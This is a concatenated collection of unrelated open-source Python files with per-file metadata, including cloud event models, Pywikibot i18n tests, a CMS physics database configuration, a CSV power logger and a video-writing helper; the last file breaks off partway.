Authors: Aric Hagberg <hagberg@lanl.gov> Gael Varoquaux <gael.varoquaux@normalesup.org> Jake Vanderplas <vanderplas@astro.washington.edu> License: BSD Graph laplacian The sparsity pattern of the matrix has holes on the diagonal, we need to fix that minus sign leads to a copy set diagonal to zero | 1,800 | en | 0.744554 |
"""
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cloudcafe.events.models.base import EventBaseModel, EventBaseListModel
class Bandwidth(EventBaseModel):
"""Bandwidth Response Model
@summary: Response model for bandwidth from a compute
event notification
@note: Although the 'public' and 'private' interfaces are
not required, they are the most common names, and are
included as optional attributes for the sake of convenience
@note: This type may contain additional unspecified
BandwidthInterface fields, which will be captured in a
dictionary called kwargs
JSON Example:
{
"private": { <BandwidthInterface> },
"public": { <BandwidthInterface> }
}
"""
kwarg_map = {'private': 'private',
'public': 'public'}
optional_kwargs = ['private', 'public']
strict_checking = False
def __init__(self, private=None, public=None, **kwargs):
super(Bandwidth, self).__init__(locals())
@classmethod
def _dict_to_obj(cls, json_dict):
"""Override dict_to_obj implementation"""
obj = cls._map_values_to_kwargs(json_dict)
for key in obj.kwargs:
obj.kwargs[key] = BandwidthInterface._dict_to_obj(obj.kwargs[key])
if obj.private:
obj.private = BandwidthInterface._dict_to_obj(obj.private)
if obj.public:
obj.public = BandwidthInterface._dict_to_obj(obj.public)
return obj
class BandwidthInterface(EventBaseModel):
"""Bandwidth Interface Response Model
@summary: Response model for bandwidth on an interface from
a compute event notification
@note: Sub-model of Bandwidth
JSON Example:
{
"bw_in": 123456,
"bw_out": 654321
}
"""
kwarg_map = {'bw_in': 'bw_in',
'bw_out': 'bw_out'}
def __init__(self, bw_in, bw_out):
super(BandwidthInterface, self).__init__(locals())
class FixedIp(EventBaseModel):
"""Fixed IP Response Model
@summary: Response model for a fixed IP address from a
compute event notification
@note: Represents a single fixed IP
JSON Example:
{
"address": "10.10.0.0",
"floating_ips": [],
"label": "public",
"meta": {},
"type": "fixed",
"version": 4,
"vif_mac": "FE:ED:FA:00:1C:D4"
}
"""
kwarg_map = {
'address': 'address',
'floating_ips': 'floating_ips',
'label': 'label',
'meta': 'meta',
'type_': 'type',
'version': 'version',
'vif_mac': 'vif_mac'}
def __init__(self, address, floating_ips, label, meta, type_, version,
vif_mac):
super(FixedIp, self).__init__(locals())
class FixedIps(EventBaseListModel):
"""Fixed IPs Model
@summary: Response model for a list of fixed IP addresses
from a compute event notification
@note: Returns a list of elements of type 'FixedIp'
JSON Example:
{
"fixed_ips": [
{ <FixedIp> },
{ <FixedIp> }
]
}
"""
list_model_key = 'fixed_ips'
ObjectModel = FixedIp
class ImageMeta(EventBaseModel):
"""Image Metadata Model
@summary: Response model for image metadata from a compute
event notification
@note: This type may contain additional unspecified
fields, which will be captured in a dictionary called kwargs
JSON Example:
{
"image_meta": {
"auto_disk_config": "disabled",
"base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"container_format": "ovf",
"disk_format": "vhd",
"image_type": "base",
"min_disk": "20",
"min_ram": "512",
"org.openstack__1__architecture": "x64",
"org.openstack__1__os_distro": "com.ubuntu",
"org.openstack__1__os_version": "12.04",
"os_type": "linux"
}
}
"""
kwarg_map = {
'auto_disk_config': 'auto_disk_config',
'base_image_ref': 'base_image_ref',
'container_format': 'container_format',
'disk_format': 'disk_format',
'image_type': 'image_type',
'min_disk': 'min_disk',
'min_ram': 'min_ram',
'org_openstack__1__architecture': 'org.openstack__1__architecture',
'org_openstack__1__os_distro': 'org.openstack__1__os_distro',
'org_openstack__1__os_version': 'org.openstack__1__os_version',
'os_type': 'os_type'}
strict_checking = False
def __init__(self, auto_disk_config, base_image_ref, container_format,
disk_format, image_type, min_disk, min_ram,
org_openstack__1__architecture, org_openstack__1__os_distro,
org_openstack__1__os_version, os_type, **kwargs):
super(ImageMeta, self).__init__(locals())
class InstanceException(EventBaseModel):
"""Instance Exception Model
@summary: Response model for an instance exception from a
compute event notification
@note: Represents a single instance exception
JSON Example:
{
"exception": {
"kwargs": {
"instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"reason": "Something broke",
"code": 500
}
}
}
"""
kwarg_map = {'kwargs': 'kwargs'}
def __init__(self, kwargs):
super(InstanceException, self).__init__(locals())
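# --- Editor's note: hedged deserialization sketch, not part of the original module ---
# How a notification fragment would typically be turned into these models; this
# assumes the EventBaseModel base class provides _map_values_to_kwargs as used by
# Bandwidth._dict_to_obj above, and the sample numbers are invented.
#     sample = {"private": {"bw_in": 100, "bw_out": 200},
#               "public": {"bw_in": 123456, "bw_out": 654321}}
#     bandwidth = Bandwidth._dict_to_obj(sample)
#     print(bandwidth.public.bw_in, bandwidth.public.bw_out)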
| cloudcafe/events/models/compute/common.py | 6,212 | Bandwidth Response Model
@summary: Response model for bandwidth from a compute
event notification
@note: Although the 'public' and 'private' interfaces are
not required, they are the most common names, and are
included as optional attributes for the sake of convenience
@note: This type may contain additional unspecified
BandwidthInterface fields, which will be captured in a
dictionary called kwargs
JSON Example:
{
"private": { <BandwidthInterface> },
"public": { <BandwidthInterface> }
}
Bandwidth Interface Response Model
@summary: Response model for bandwidth on an interface from
a compute event notification
@note: Sub-model of Bandwidth
JSON Example:
{
"bw_in": 123456,
"bw_out": 654321
}
Fixed IP Response Model
@summary: Response model for a fixed IP address from a
compute event notification
@note: Represents a single fixed IP
JSON Example:
{
"address": "10.10.0.0",
"floating_ips": [],
"label": "public",
"meta": {},
"type": "fixed",
"version": 4,
"vif_mac": "FE:ED:FA:00:1C:D4"
}
Fixed IPs Model
@summary: Response model for a list of fixed IP addresses
from a compute event notification
@note: Returns a list of elements of type 'FixedIp'
JSON Example:
{
"fixed_ips": [
{ <FixedIp> },
{ <FixedIp> }
]
}
Image Metadata Model
@summary: Response model for image metadata from a compute
event notification
@note: This type may contain additional unspecified
fields, which will be captured in a dictionary called kwargs
JSON Example:
{
"image_meta": {
"auto_disk_config": "disabled",
"base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"container_format": "ovf",
"disk_format": "vhd",
"image_type": "base",
"min_disk": "20",
"min_ram": "512",
"org.openstack__1__architecture": "x64",
"org.openstack__1__os_distro": "com.ubuntu",
"org.openstack__1__os_version": "12.04",
"os_type": "linux"
}
}
Instance Exception Model
@summary: Response model for an instance exception from a
compute event notification
@note: Represents a single instance exception
JSON Example:
{
"exception": {
"kwargs": {
"instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"reason": "Something broke",
"code": 500
}
}
}
Override dict_to_obj implementation
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. | 3,166 | en | 0.743016 |
# -*- coding: utf-8 -*-
"""Test i18n module."""
#
# (C) Pywikibot team, 2007-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id: 791a455ab0a66f7bafcfb71718f915c9dd7b7ab2 $'
import sys
import pywikibot
from pywikibot import i18n, bot, plural
from tests.aspects import unittest, TestCase, DefaultSiteTestCase, PwbTestCase
if sys.version_info[0] == 3:
basestring = (str, )
class TestTranslate(TestCase):
"""Test translate method."""
net = False
def setUp(self):
self.msg_localized = {'en': u'test-localized EN',
'nl': u'test-localized NL',
'fy': u'test-localized FY'}
self.msg_semi_localized = {'en': u'test-semi-localized EN',
'nl': u'test-semi-localized NL'}
self.msg_non_localized = {'en': u'test-non-localized EN'}
self.msg_no_english = {'ja': u'test-no-english JA'}
super(TestTranslate, self).setUp()
def testLocalized(self):
self.assertEqual(i18n.translate('en', self.msg_localized,
fallback=True),
u'test-localized EN')
self.assertEqual(i18n.translate('nl', self.msg_localized,
fallback=True),
u'test-localized NL')
self.assertEqual(i18n.translate('fy', self.msg_localized,
fallback=True),
u'test-localized FY')
def testSemiLocalized(self):
self.assertEqual(i18n.translate('en', self.msg_semi_localized,
fallback=True),
u'test-semi-localized EN')
self.assertEqual(i18n.translate('nl', self.msg_semi_localized,
fallback=True),
u'test-semi-localized NL')
self.assertEqual(i18n.translate('fy', self.msg_semi_localized,
fallback=True),
u'test-semi-localized NL')
def testNonLocalized(self):
self.assertEqual(i18n.translate('en', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
self.assertEqual(i18n.translate('fy', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
self.assertEqual(i18n.translate('nl', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
self.assertEqual(i18n.translate('ru', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
def testNoEnglish(self):
self.assertEqual(i18n.translate('en', self.msg_no_english,
fallback=True),
u'test-no-english JA')
self.assertEqual(i18n.translate('fy', self.msg_no_english,
fallback=True),
u'test-no-english JA')
self.assertEqual(i18n.translate('nl', self.msg_no_english,
fallback=True),
u'test-no-english JA')
class UserInterfaceLangTestCase(TestCase):
"""Base class for tests using config.userinterface_lang."""
def setUp(self):
super(UserInterfaceLangTestCase, self).setUp()
self.orig_userinterface_lang = pywikibot.config.userinterface_lang
pywikibot.config.userinterface_lang = self.get_site().code
def tearDown(self):
pywikibot.config.userinterface_lang = self.orig_userinterface_lang
super(UserInterfaceLangTestCase, self).tearDown()
class TWNSetMessagePackageBase(TestCase):
"""Partial base class for TranslateWiki tests."""
message_package = None
def setUp(self):
self.orig_messages_package_name = i18n._messages_package_name
i18n.set_messages_package(self.message_package)
super(TWNSetMessagePackageBase, self).setUp()
def tearDown(self):
super(TWNSetMessagePackageBase, self).tearDown()
i18n.set_messages_package(self.orig_messages_package_name)
class TWNTestCaseBase(TWNSetMessagePackageBase):
"""Base class for TranslateWiki tests."""
@classmethod
def setUpClass(cls):
if not isinstance(cls.message_package, basestring):
raise TypeError('%s.message_package must be a package name'
% cls.__name__)
        # The call to set_messages_package below exists only to confirm
        # that the package exists and messages are available, so
        # that tests can be skipped if the i18n data doesn't exist.
cls.orig_messages_package_name = i18n._messages_package_name
i18n.set_messages_package(cls.message_package)
has_messages = i18n.messages_available()
i18n._messages_package_name = cls.orig_messages_package_name
if not has_messages:
raise unittest.SkipTest("i18n messages package '%s' not available."
% cls.message_package)
super(TWNTestCaseBase, cls).setUpClass()
class TestTWTranslate(TWNTestCaseBase):
"""Test twtranslate method."""
net = False
message_package = 'tests.i18n'
def testLocalized(self):
self.assertEqual(i18n.twtranslate('en', 'test-localized'),
u'test-localized EN')
self.assertEqual(i18n.twtranslate('nl', 'test-localized'),
u'test-localized NL')
self.assertEqual(i18n.twtranslate('fy', 'test-localized'),
u'test-localized FY')
def testSemiLocalized(self):
self.assertEqual(i18n.twtranslate('en', 'test-semi-localized'),
u'test-semi-localized EN')
self.assertEqual(i18n.twtranslate('nl', 'test-semi-localized'),
u'test-semi-localized NL')
self.assertEqual(i18n.twtranslate('fy', 'test-semi-localized'),
u'test-semi-localized NL')
def testNonLocalized(self):
self.assertEqual(i18n.twtranslate('en', 'test-non-localized'),
u'test-non-localized EN')
self.assertEqual(i18n.twtranslate('fy', 'test-non-localized'),
u'test-non-localized EN')
self.assertEqual(i18n.twtranslate('nl', 'test-non-localized'),
u'test-non-localized EN')
self.assertEqual(i18n.twtranslate('ru', 'test-non-localized'),
u'test-non-localized EN')
def testNoEnglish(self):
self.assertRaises(i18n.TranslationError, i18n.twtranslate,
'en', 'test-no-english')
class TestTWNTranslate(TWNTestCaseBase):
"""Test {{PLURAL:}} support."""
net = False
message_package = 'tests.i18n'
def testNumber(self):
"""Use a number."""
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 0) % {'num': 0},
u'Bot: Ändere 0 Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 1) % {'num': 1},
u'Bot: Ändere 1 Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 2) % {'num': 2},
u'Bot: Ändere 2 Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 3) % {'num': 3},
u'Bot: Ändere 3 Seiten.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 0) % {'num': 'no'},
u'Bot: Changing no pages.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 1) % {'num': 'one'},
u'Bot: Changing one page.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 2) % {'num': 'two'},
u'Bot: Changing two pages.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 3) % {'num': 'three'},
u'Bot: Changing three pages.')
def testString(self):
"""Use a string."""
self.assertEqual(
i18n.twntranslate('en', 'test-plural', '1') % {'num': 'one'},
u'Bot: Changing one page.')
def testDict(self):
"""Use a dictionary."""
self.assertEqual(
i18n.twntranslate('en', 'test-plural', {'num': 2}),
u'Bot: Changing 2 pages.')
def testExtended(self):
"""Use additional format strings."""
self.assertEqual(
i18n.twntranslate('fr', 'test-plural', {'num': 1, 'descr': 'seulement'}),
u'Robot: Changer seulement une page.')
def testExtendedOutside(self):
"""Use additional format strings also outside."""
self.assertEqual(
i18n.twntranslate('fr', 'test-plural', 1) % {'descr': 'seulement'},
u'Robot: Changer seulement une page.')
def testMultiple(self):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', 1)
% {'action': u'Ändere', 'line': u'eine'},
u'Bot: Ändere eine Zeile von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', 2)
% {'action': u'Ändere', 'line': u'zwei'},
u'Bot: Ändere zwei Zeilen von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', 3)
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', (1, 2, 2))
% {'action': u'Ändere', 'line': u'eine'},
u'Bot: Ändere eine Zeile von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', [3, 1, 1])
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', ["3", 1, 1])
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', "321")
% {'action': u'Ändere', 'line': u'dreihunderteinundzwanzig'},
u'Bot: Ändere dreihunderteinundzwanzig Zeilen von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': 1, 'page': 1}),
u'Bot: Ändere 1 Zeile von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': 1, 'page': 2}),
u'Bot: Ändere 1 Zeile von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': "11", 'page': 2}),
u'Bot: Ändere 11 Zeilen von mehreren Seiten.')
def testMultipleWrongParameterLength(self):
"""Test wrong parameter length."""
with self.assertRaisesRegex(ValueError, "Length of parameter does not match PLURAL occurrences"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', (1, 2))
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von mehreren Seiten.')
with self.assertRaisesRegex(ValueError, "Length of parameter does not match PLURAL occurrences"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', ["321"])
% {'action': u'Ändere', 'line': u'dreihunderteinundzwanzig'},
u'Bot: Ändere dreihunderteinundzwanzig Zeilen von mehreren Seiten.')
def testMultipleNonNumbers(self):
"""Test error handling for multiple non-numbers."""
with self.assertRaisesRegex(ValueError, "invalid literal for int\(\) with base 10: 'drei'"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', ["drei", "1", 1])
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von einer Seite.')
with self.assertRaisesRegex(ValueError, "invalid literal for int\(\) with base 10: 'elf'"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': "elf", 'page': 2}),
u'Bot: Ändere elf Zeilen von mehreren Seiten.')
def testAllParametersExist(self):
with self.assertRaisesRegex(KeyError, repr(u'line')):
# all parameters must be inside twntranslate
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'line': 1, 'page': 1})
% {'action': u'Ändere'},
u'Bot: Ändere 1 Zeile von einer Seite.')
def test_fallback_lang(self):
"""
Test that twntranslate uses the translation's language.
twntranslate calls _twtranslate which might return the translation for
a different language and then the plural rules from that language need
to be applied.
"""
# co has fr as altlang but has no plural rules defined (otherwise this
# test might not catch problems) so it's using the plural variant for 0
# although French uses the plural variant for numbers > 1 (so not 0)
assert 'co' not in plural.plural_rules
assert plural.plural_rules['fr']['plural'](0) is False
self.assertEqual(
i18n.twntranslate('co', 'test-plural', {'num': 0, 'descr': 'seulement'}),
u'Robot: Changer seulement une page.')
self.assertEqual(
i18n.twntranslate('co', 'test-plural', {'num': 1, 'descr': 'seulement'}),
u'Robot: Changer seulement une page.')
class ScriptMessagesTestCase(TWNTestCaseBase):
"""Real messages test."""
net = False
message_package = 'scripts.i18n'
def test_basic(self):
"""Verify that real messages are able to be loaded."""
self.assertEqual(i18n.twntranslate('en', 'pywikibot-enter-new-text'),
'Please enter the new text:')
def test_missing(self):
"""Test a missing message from a real message bundle."""
self.assertRaises(i18n.TranslationError,
i18n.twntranslate, 'en', 'pywikibot-missing-key')
class InputTestCase(TWNTestCaseBase, UserInterfaceLangTestCase, PwbTestCase):
"""Test i18n.input."""
family = 'wikipedia'
code = 'arz'
message_package = 'scripts.i18n'
@classmethod
def setUpClass(cls):
if cls.code in i18n.twget_keys('pywikibot-enter-category-name'):
raise unittest.SkipTest(
'%s has a translation for %s'
% (cls.code, 'pywikibot-enter-category-name'))
super(InputTestCase, cls).setUpClass()
def test_pagegen_i18n_input(self):
"""Test i18n.input via ."""
result = self._execute(args=['listpages', '-cat'],
data_in='non-existant-category\n',
timeout=5)
self.assertIn('Please enter the category name:', result['stderr'])
class MissingPackageTestCase(TWNSetMessagePackageBase,
UserInterfaceLangTestCase,
DefaultSiteTestCase):
"""Test misssing messages package."""
message_package = 'scripts.foobar.i18n'
def _capture_output(self, text, *args, **kwargs):
self.output_text = text
def setUp(self):
super(MissingPackageTestCase, self).setUp()
self.output_text = ''
self.orig_raw_input = bot.ui._raw_input
self.orig_output = bot.ui.output
bot.ui._raw_input = lambda *args, **kwargs: 'dummy input'
bot.ui.output = self._capture_output
def tearDown(self):
bot.ui._raw_input = self.orig_raw_input
bot.ui.output = self.orig_output
super(MissingPackageTestCase, self).tearDown()
def test_pagegen_i18n_input(self):
"""Test i18n.input falls back with missing message package."""
rv = i18n.input('pywikibot-enter-category-name',
fallback_prompt='dummy output')
self.assertEqual(rv, 'dummy input')
self.assertIn('dummy output: ', self.output_text)
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
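# --- Editor's note: hedged illustration, not part of the original module ---
# The 'test-plural' keys exercised above rely on translatewiki-style {{PLURAL:}}
# markup resolved by twntranslate before %-formatting; an entry in the tests.i18n
# package would look roughly like this (the exact file layout is an assumption):
#     en: "test-plural": "Bot: Changing %(num)s {{PLURAL:%(num)d|page|pages}}."
#     de: "test-plural": "Bot: Ändere %(num)s {{PLURAL:%(num)d|Seite|Seiten}}."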
| tests/i18n_tests.py | 16,847 | Test i18n.input.
 Test missing messages package.
Real messages test.
Partial base class for TranslateWiki tests.
Base class for TranslateWiki tests.
Test {{PLURAL:}} support.
Test twtranslate method.
Test translate method.
Base class for tests using config.userinterface_lang.
Use a dictionary.
Use additional format strings.
Use additional format strings also outside.
Test error handling for multiple non-numbers.
Test wrong parameter length.
Use a number.
Use a string.
Verify that real messages are able to be loaded.
Test that twntranslate uses the translation's language.
twntranslate calls _twtranslate which might return the translation for
a different language and then the plural rules from that language need
to be applied.
Test a missing message from a real message bundle.
Test i18n.input via .
Test i18n.input falls back with missing message package.
Test i18n module.
-*- coding: utf-8 -*- (C) Pywikibot team, 2007-2014 Distributed under the terms of the MIT license. Th call to set_messages_package below exists only to confirm that the package exists and messages are available, so that tests can be skipped if the i18n data doesnt exist. all parameters must be inside twntranslate co has fr as altlang but has no plural rules defined (otherwise this test might not catch problems) so it's using the plural variant for 0 although French uses the plural variant for numbers > 1 (so not 0) | 1,408 | en | 0.686094 |
import socket
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
process = cms.Process("LHCInfoPopulator")
from CondCore.CondDB.CondDB_cfi import *
#process.load("CondCore.DBCommon.CondDBCommon_cfi")
#process.CondDBCommon.connect = 'sqlite_file:lhcinfo_pop_test.db'
#process.CondDBCommon.DBParameters.authenticationPath = '.'
#process.CondDBCommon.DBParameters.messageLevel=cms.untracked.int32(1)
sourceConnection = 'oracle://cms_omds_adg/CMS_RUNINFO_R'
if socket.getfqdn().find('.cms') != -1:
sourceConnection = 'oracle://cms_omds_lb/CMS_RUNINFO_R'
options = VarParsing.VarParsing()
options.register( 'destinationConnection'
, 'sqlite_file:lhcinfo_pop_test.db' #default value
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.string
, "Connection string to the DB where payloads will be possibly written."
)
options.register( 'targetConnection'
, '' #default value
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.string
, """Connection string to the target DB:
if not empty (default), this provides the latest IOV and payloads to compare;
it is the DB where payloads should be finally uploaded."""
)
options.register( 'tag'
, 'LHCInfo_PopCon_start_test'
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.string
, "Tag written in destinationConnection and finally appended in targetConnection."
)
options.register( 'messageLevel'
, 0 #default value
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.int
, "Message level; default to 0"
)
options.parseArguments()
CondDBConnection = CondDB.clone( connect = cms.string( options.destinationConnection ) )
CondDBConnection.DBParameters.messageLevel = cms.untracked.int32( options.messageLevel )
process.MessageLogger = cms.Service("MessageLogger",
cout = cms.untracked.PSet(threshold = cms.untracked.string('INFO')),
destinations = cms.untracked.vstring('cout')
)
process.source = cms.Source("EmptyIOVSource",
lastValue = cms.uint64(1),
timetype = cms.string('runnumber'),
firstValue = cms.uint64(1),
interval = cms.uint64(1)
)
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
CondDBConnection,
timetype = cms.untracked.string('timestamp'),
toPut = cms.VPSet(cms.PSet(record = cms.string('LHCInfoRcd'),
tag = cms.string( options.tag )
)
)
)
process.Test1 = cms.EDAnalyzer("LHCInfoPopConAnalyzer",
SinceAppendMode = cms.bool(True),
record = cms.string('LHCInfoRcd'),
name = cms.untracked.string('LHCInfo'),
Source = cms.PSet(fill = cms.untracked.uint32(6417),
startTime = cms.untracked.string('2018-04-01 00:00:00.000'),
#endTime = cms.untracked.string('2018-03-25 05:00:00.000'),
samplingInterval = cms.untracked.uint32( 600 ),
endFill = cms.untracked.bool(False),
connectionString = cms.untracked.string("oracle://cms_orcon_adg/CMS_RUNTIME_LOGGER"),
ecalConnectionString = cms.untracked.string("oracle://cms_orcon_adg/CMS_DCS_ENV_PVSS_COND"),
DIPSchema = cms.untracked.string("CMS_BEAM_COND"),
omsBaseUrl = cms.untracked.string("http://vocms0184.cern.ch/agg/api/v1"),
#authenticationPath = cms.untracked.string("."),
debug=cms.untracked.bool(False)
),
loggingOn = cms.untracked.bool(True),
IsDestDbCheckedInQueryLog = cms.untracked.bool(False)
)
process.p = cms.Path(process.Test1)
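# --- Editor's note: hedged usage note, not part of the original configuration ---
# With VarParsing, the registered options are typically overridden on the cmsRun
# command line; the connection string and tag below are illustrative only:
#     cmsRun LHCInfoPopConAnalyzerStartFill.py \
#         destinationConnection=sqlite_file:lhcinfo_pop_test.db \
#         tag=LHCInfo_PopCon_start_test messageLevel=1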
| CondTools/RunInfo/python/LHCInfoPopConAnalyzerStartFill.py | 4,917 | process.load("CondCore.DBCommon.CondDBCommon_cfi")process.CondDBCommon.connect = 'sqlite_file:lhcinfo_pop_test.db'process.CondDBCommon.DBParameters.authenticationPath = '.'process.CondDBCommon.DBParameters.messageLevel=cms.untracked.int32(1)default valuedefault valuedefault valueendTime = cms.untracked.string('2018-03-25 05:00:00.000'),authenticationPath = cms.untracked.string("."), | 386 | en | 0.197523 |
"""
CSVLogger writes power values to a csv file.
"""
__author__ = 'Md Shifuddin Al Masud'
__email__ = 'shifuddin.masud@gmail.com'
__license__ = 'MIT License'
from pv_simulator.FileWriter import FileWriter
import csv
from datetime import datetime
import aiofiles
from aiocsv import AsyncWriter
import logging
class CSVFileWriter(FileWriter):
__destination = ""
def __init__(self, destination):
"""
        :param destination: path of the CSV file that rows are appended to
"""
self.__destination = destination
async def write(self, timestamp: datetime, meter_power_value: int, simulator_power_value: int,
combined_power_value: int) -> None:
"""
Writes values into a csv file
:param timestamp:
:param meter_power_value:
:param simulator_power_value:
:param combined_power_value:
:return:
"""
async with aiofiles.open(self.__destination, mode='a') as csv_file:
csv_file_writer = AsyncWriter(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
await csv_file_writer.writerow([datetime.now(), meter_power_value, simulator_power_value,
combined_power_value])
logging.debug("%s, %s, %s, %s are writen to %s", datetime.now(), meter_power_value, simulator_power_value,
combined_power_value, self.__destination)
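# --- Editor's note: hedged usage sketch, not part of the original module ---
# Appends one sample row; the file name and power values are illustrative, and
# FileWriter is assumed to declare the write() interface implemented above.
if __name__ == "__main__":
    import asyncio
    demo_writer = CSVFileWriter("pv_output.csv")
    asyncio.run(demo_writer.write(datetime.now(), 1500, 2750, 4250))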
| pv_simulator/CSVFileWriter.py | 1,401 | :param destination:
CSVLogger writes power values to a csv file. | 64 | en | 0.581016 |
'''
This function takes in frames, scale, data_path and save_original_path as the arguments. It writes a video
consisting of the given frames, resized according to scale, into save_original_path.
inputs :
    - frames = list of frames i.e. numpy arrays
    - scale = resize factor (float) or target (height, width) tuple
    - data_path = path to original data, string
    - save_original_path = path to save scaled video, string
    - Detrac = for development purposes only; if True, frames are read from the DETRAC-Images directory instead
outputs : None
'''
import cv2
import os
import imageio
from glob import glob
from tqdm import tqdm
def write_original_video(frames, scale=1 , data_path='', save_original_path='' ,Detrac = False):
if Detrac:
c = 0
width = 960
height = 540
fourcc = cv2.VideoWriter_fourcc(*'MP42')
for i in os.listdir('DETRAC-Images/'):
video = cv2.VideoWriter('./DETRAC_video.avi',fourcc,30, (width,height))
for j in range(1, len(os.listdir('DETRAC-Images/' + i + '/'))+1):
j = str(j)
jj= 5-len(j)
k = "img" + jj*"0" +j +".jpg"
img = imageio.imread('DETRAC-Images/' + i + '/' + k + '/')
video.write(img)
video.release()
cv2.destroyAllWindows()
break
video.release()
cv2.destroyAllWindows()
else:
c = 0
fourcc = cv2.VideoWriter_fourcc(*'MP42')
if type(scale) == tuple:
width = scale[1]
height = scale[0]
else:
cap = cv2.VideoCapture(data_path)
ret, img_for_shape = cap.read()
cap.release()
width = float(scale) * int(img_for_shape.shape[1])
height = float(scale) * int(img_for_shape.shape[0])
width = int(width)
height = int(height)
video = cv2.VideoWriter(save_original_path,fourcc,30, (width,height))
print()
for img in tqdm(list(frames)):
img = cv2.resize( img , (width, height))
video.write(img)
video.release()
cv2.destroyAllWindows()
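# --- Editor's note: hedged usage sketch, not part of the original module ---
# Typical call for the non-DETRAC branch; 'input.mp4' is a placeholder path and
# the channel flip is needed because imageio yields RGB while cv2 expects BGR.
#     reader = imageio.get_reader('input.mp4')
#     frames = [frame[:, :, ::-1] for frame in reader]
#     write_original_video(frames, scale=0.5, data_path='input.mp4',
#                          save_original_path='scaled_output.avi')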
| storage/compression/write_original_video.py | 2,302 | This function takes in index_list, data_path , save_path as the arguments. It writes a video consisting
of the frame in data_path into save_path and writes a text file with the indexed of the representative
frame into the same directory
inputs :
- frames = list of frames i.e. numpy arrays
- scale = scale to resize, int
- data_path = path to original data, string
- save_original_path = path to save scaled video, string
- Detrac = For development purposes only, True
outputs : None | 513 | en | 0.781772 |
"""Tests for _data_finder.py."""
import os
import shutil
import tempfile
import pytest
import yaml
import esmvalcore._config
from esmvalcore._data_finder import (get_input_filelist, get_input_fx_filelist,
get_output_file)
from esmvalcore.cmor.table import read_cmor_tables
# Initialize with standard config developer file
esmvalcore._config.CFG = esmvalcore._config.read_config_developer_file()
# Initialize CMOR tables
read_cmor_tables(esmvalcore._config.CFG)
# Load test configuration
with open(os.path.join(os.path.dirname(__file__), 'data_finder.yml')) as file:
CONFIG = yaml.safe_load(file)
def print_path(path):
"""Print path."""
txt = path
if os.path.isdir(path):
txt += '/'
if os.path.islink(path):
txt += ' -> ' + os.readlink(path)
print(txt)
def tree(path):
"""Print path, similar to the the `tree` command."""
print_path(path)
for dirpath, dirnames, filenames in os.walk(path):
for dirname in dirnames:
print_path(os.path.join(dirpath, dirname))
for filename in filenames:
print_path(os.path.join(dirpath, filename))
def create_file(filename):
"""Create an empty file."""
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(filename, 'a'):
pass
def create_tree(path, filenames=None, symlinks=None):
